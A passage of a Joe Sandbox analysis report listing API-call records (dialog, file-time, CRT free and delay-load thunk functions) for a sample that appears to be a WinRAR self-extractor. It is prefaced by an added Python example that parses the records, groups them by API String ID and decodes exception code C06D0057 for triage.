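The entries above are machine-generated function records, and the run of blocks sharing API String ID 697777088-0 are the compiler's delay-load import thunks: each one calls ___delayLoadHelper2@8, whose failure path is RaiseException with code C06D0057. An analyst triaging this dump wants to collapse those into one bucket rather than read eight near-identical stubs. The following Python is an added example, not Joe Sandbox code and not part of the report: it parses a constructed excerpt written in the report's own layout (values copied from the entries above, Associated and fuzzy-hash lines left out), groups entries by API String ID, and decodes the exception code using the VcppException layout from delayimp.h (severity | FACILITY_VISUALCPP << 16 | error). The function names and the excerpt are this example's own assumptions.

```python
"""Parse Joe Sandbox function-entry blocks and group them by API String ID.
Added example; the block layout and field names come from the report text,
the parsing logic, function names and SAMPLE_REPORT excerpt are this example's own."""
import re
from collections import defaultdict

# Constructed excerpt in the report's own layout (values copied from the report).
SAMPLE_REPORT = """\
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E878B7), ref: 00E92D6E
  • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
  • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
Memory Dump Source
• Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: a631ab256000d205f6322e34ecc3af0320ac926a53b3dff58e9c211e368119ed
APIs
Memory Dump Source
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: d91e8cf50d68e3c3bc1e3f6785d5762b8dd3a78c84f47cf6f64c6752051a4ec0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
  • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
  • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
Memory Dump Source
Similarity
• API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
• API String ID: 697777088-0
• Opcode ID: 00007d6b07965a8d159266a2041df5f8aea55bc49bf7a47ecc65a2d396bb0cc7
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
  • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
Memory Dump Source
Similarity
• API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
• API String ID: 697777088-0
• Opcode ID: 658feef5239d5dbe25c82a62424f39c145cbf05ffdc0adfde59c296afd32e102
"""

# "Name.MODULE(arg,...), ref: ADDR" or "Name.MODULE ref: ADDR" (no argument list)
_CALL_RE = re.compile(r"^(?P<name>[\w@$.?]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
_SUBCALL_RE = re.compile(r"^• Part of subcall function (?P<fn>[0-9A-F]+): (?P<call>.+)$")
_FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+):\s?(?P<val>.*)$")


def _parse_call(text):
    """Turn one API-call line into a dict, or None if the line is not a call."""
    m = _CALL_RE.match(text)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"),
            "args": args.split(",") if args is not None else [],
            "ref": m.group("ref")}


def parse_entries(report_text):
    """Split the text into function entries; every 'APIs' heading starts a new one."""
    entries, current = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "subcalls": [], "fields": {}}
            entries.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # other headings: Memory Dump Source, Similarity, ...
        m = _SUBCALL_RE.match(line)
        if m:
            call = _parse_call(m.group("call"))
            if call:
                call["via"] = m.group("fn")  # address of the callee making this call
                current["subcalls"].append(call)
            continue
        call = _parse_call(line[1:].strip())
        if call:
            current["calls"].append(call)
            continue
        m = _FIELD_RE.match(line)
        if m:
            current["fields"][m.group("key")] = m.group("val").strip()
    return entries


def group_by_api_string_id(entries):
    """Entries with the same API String ID share one API/string footprint, so this
    collapses the repeated delay-load thunks into a single bucket."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["fields"].get("API String ID", "<none>")].append(e)
    return dict(groups)


FACILITY_VISUALCPP = 0x6D  # delayimp.h: VcppException(sev, err) = sev | (0x6D << 16) | err


def decode_vcpp_exception(code):
    """Split an NTSTATUS-style code such as C06D0057 into severity, facility, error."""
    return {"severity": code >> 30, "facility": (code >> 16) & 0x7FF, "error": code & 0xFFFF}


def delay_load_thunks(entries):
    """Call-site refs of entries that are plain CRT delay-load stubs: they call
    ___delayLoadHelper2@8 and the helper raises a FACILITY_VISUALCPP exception."""
    refs = []
    for e in entries:
        helper = [c for c in e["calls"] if c["name"].startswith("___delayLoadHelper2@8")]
        raises = [c for c in e["subcalls"]
                  if c["name"] == "RaiseException.KERNEL32" and c["args"]
                  and decode_vcpp_exception(int(c["args"][0], 16))["facility"] == FACILITY_VISUALCPP]
        if helper and raises:
            refs.append(helper[0]["ref"])
    return refs
```

Decoding C06D0057 gives severity 3 (error), facility 0x6D (Visual C++) and error 87 (ERROR_INVALID_PARAMETER), which identifies the raise as the CRT delay-load helper's own failure path rather than logic written by the malware author; the thunks can be set aside and attention spent on entries such as the GDI+ bitmap-from-stream and message-loop functions.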
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E934DB
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNEL32(?,00E8FFD0,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,00ECFA3A,00000006), ref: 00E8FE28
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: e6a02e12f558535e65611e21c0dcebf16c8a6b5f41671017c2e793cfd8d9c7c3
                                                              • Instruction ID: 33465871c3257baf6576a398f79902faa9740f608fbe89f4582b37198f4aecae
                                                              • Instruction Fuzzy Hash: 42A012302005008F92000B218F4550F75596F51600F00C025610580030CB308824A500
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E912F1
                                                              • EndDialog.USER32(?,00000006), ref: 00E91304
                                                              • GetDlgItem.USER32(?,0000006C), ref: 00E91320
                                                              • SetFocus.USER32(00000000), ref: 00E91327
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00E91361
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E91398
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E913AE
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E913CC
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E913DC
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E913F8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E91414
                                                              • _swprintf.LIBCMT ref: 00E91444
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E91457
                                                              • FindClose.KERNEL32(00000000), ref: 00E9145E
                                                              • _swprintf.LIBCMT ref: 00E914B7
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00E914CA
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E914E7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E91507
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E91517
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E91531
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E91549
                                                              • _swprintf.LIBCMT ref: 00E91575
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E91588
                                                              • _swprintf.LIBCMT ref: 00E915DC
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00E915EF
                                                                • Part of subcall function 00E9006D: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E90093
                                                                • Part of subcall function 00E9006D: GetNumberFormatW.KERNEL32(00000400,00000000,?,00EB360C,?,?), ref: 00E900E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                              • API String ID: 797121971-1840816070
                                                              • Opcode ID: 3fbf932107f527d7b801b42ef245469d6037442d5e361d8776b626ff06f141a9
                                                              • Instruction ID: 67c07be320351ec38b482a4b3ade9fa0ace0dbc1b0d604e3c8cb2cc6f11fbfcd
                                                              • Instruction Fuzzy Hash: 3691DA72148349BFE721EBA0CD89FFB77ECEB4A704F011819F649E6181D771A6088762
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E9456D
                                                              • IsDebuggerPresent.KERNEL32 ref: 00E94639
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E94659
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00E94663
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: c36ba4c610c2fb58c0c05aa9385fb6c167c5529fdedfbf5b93b11954b393c759
                                                              • Instruction ID: 4ff6476733e8867e0dd1a822bc1dcda9a6e5ddec79584ee759fb6171649e8b28
                                                              • Instruction Fuzzy Hash: 643108B5D053189BDF10DFA5D989BCDBBF8BF19304F1041AAE409A7290EB719A898F44
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E8496E
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                                • Part of subcall function 00E87B46: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00E8498A,?,00000000,00000000,?,?,?,00E8498A,?,?,00000050), ref: 00E87B63
                                                              • _strlen.LIBCMT ref: 00E8498F
                                                              • SetDlgItemTextW.USER32(?,00EB3154,?), ref: 00E849EF
                                                              • GetWindowRect.USER32(?,?), ref: 00E84A29
                                                              • GetClientRect.USER32(?,?), ref: 00E84A35
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E84AD5
                                                              • GetWindowRect.USER32(?,?), ref: 00E84B02
                                                              • SetWindowTextW.USER32(?,?), ref: 00E84B3B
                                                              • GetSystemMetrics.USER32(00000008), ref: 00E84B43
                                                              • GetWindow.USER32(?,00000005), ref: 00E84B4E
                                                              • GetWindowRect.USER32(00000000,?), ref: 00E84B7B
                                                              • GetWindow.USER32(00000000,00000002), ref: 00E84BED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$T1$d$1
                                                              • API String ID: 2407758923-2160731728
                                                              • Opcode ID: a05ec43908c88b983ecda9bb4bc7174fb43c8a8003d8936adddb20ff8831b4bb
                                                              • Instruction ID: a71257a66c38bbdb16dacc8684ece40cabc8e4ab2ae84a3f88f059610820e839
                                                              • Instruction Fuzzy Hash: A881D4B2104346AFD710EF69CD89E6BBBE8EBC8704F05151DF988E7291D630E9098B52
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 00EA14E6
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA109E
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10B0
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10C2
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10D4
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10E6
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10F8
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA110A
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA111C
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA112E
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1140
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1152
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1164
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1176
                                                              • _free.LIBCMT ref: 00EA14DB
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00EA14FD
                                                              • _free.LIBCMT ref: 00EA1512
                                                              • _free.LIBCMT ref: 00EA151D
                                                              • _free.LIBCMT ref: 00EA153F
                                                              • _free.LIBCMT ref: 00EA1552
                                                              • _free.LIBCMT ref: 00EA1560
                                                              • _free.LIBCMT ref: 00EA156B
                                                              • _free.LIBCMT ref: 00EA15A3
                                                              • _free.LIBCMT ref: 00EA15AA
                                                              • _free.LIBCMT ref: 00EA15C7
                                                              • _free.LIBCMT ref: 00EA15DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: 88$p=
                                                              • API String ID: 161543041-980160608
                                                              • Opcode ID: 41c206516c153a6a000cf2e18b8a35cf43fa01cf26cbc81bc953dd5209e34a83
                                                              • Instruction ID: 57b23850acaa836295a27b2cd999342f4bef34472557f9bc81d67850d81c73cb
                                                              • Instruction Fuzzy Hash: 54316F71A086449FDF20AAB8DC45B9AB3E9EF46314F14649AE459FB191DF30FD80CB11
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E8E956
                                                              • _wcslen.LIBCMT ref: 00E8E9F6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00E8EA05
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E8EA26
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E8EA4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-4209811716
                                                              • Opcode ID: 5fce3b07afdf8713464113574e2173f27a526101e563659926b045bac0a975ba
                                                              • Instruction ID: 8bbc9948a5d8eed713563fdcbb2f7fcd241c153c6d60d68c58d1b8d93a9d97c8
                                                              • Instruction Fuzzy Hash: D53127721043017FEB28BB749C46F6F779CAF86714F24205EF509B62D2EB64A90883A5
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 00E92701
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00E9272D
                                                                • Part of subcall function 00E87D24: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E82FEC,?,?,?,00E82F99,?,-00000002,?,00000000,?), ref: 00E87D3A
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E92749
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E92760
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E92774
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E9279D
                                                              • DeleteObject.GDI32(00000000), ref: 00E927A4
                                                              • GetWindow.USER32(00000000,00000002), ref: 00E927AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 4a7f5557a0788a0769f338a9b540ba95b476464ec3f0cf0b9bc0a223563d03bb
                                                              • Instruction ID: a569570c40dbaebe03041ec23029fb5b4509fbe38628ff412e2a272cb8fd1ca8
                                                              • Instruction Fuzzy Hash: 6E1127721407547FEF20B7B19C89FAF36ECAF54720F001029FA49B9193D6608D0983B0
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9E025
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00E9E031
                                                              • _free.LIBCMT ref: 00E9E03C
                                                              • _free.LIBCMT ref: 00E9E047
                                                              • _free.LIBCMT ref: 00E9E052
                                                              • _free.LIBCMT ref: 00E9E05D
                                                              • _free.LIBCMT ref: 00E9E068
                                                              • _free.LIBCMT ref: 00E9E073
                                                              • _free.LIBCMT ref: 00E9E07E
                                                              • _free.LIBCMT ref: 00E9E08C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 00E978D0
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00E979DE
                                                              • _UnwindNestedFrames.LIBCMT ref: 00E97B30
                                                              • CallUnexpected.LIBVCRUNTIME ref: 00E97B4B
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm$[[
                                                              • API String ID: 2751267872-3215828536
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00E8F10E
                                                              • GetWindowRect.USER32(?,00000000), ref: 00E8F164
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00E8F1FB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00E8F203
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00E8F219
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: RarHtmlClassName$z2$1
                                                              • API String ID: 3937224194-3439405266
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • EndDialog.USER32(?,00000001), ref: 00E90650
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E90677
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E90690
                                                              • SetWindowTextW.USER32(?,?), ref: 00E906A1
                                                              • GetDlgItem.USER32(?,00000065), ref: 00E906AA
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E906BE
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E906D4
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00E97267
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E9726F
                                                              • _ValidateLocalCookies.LIBCMT ref: 00E972F8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00E97323
                                                              • _ValidateLocalCookies.LIBCMT ref: 00E97378
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm$pY
                                                              • API String ID: 1170836740-1810000616
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E109
                                                              • _free.LIBCMT ref: 00E9E13C
                                                              • _free.LIBCMT ref: 00E9E164
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E171
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E17D
                                                              • _abort.LIBCMT ref: 00E9E183
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID: x7
                                                              • API String ID: 3160817290-374306512
                                                              APIs
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
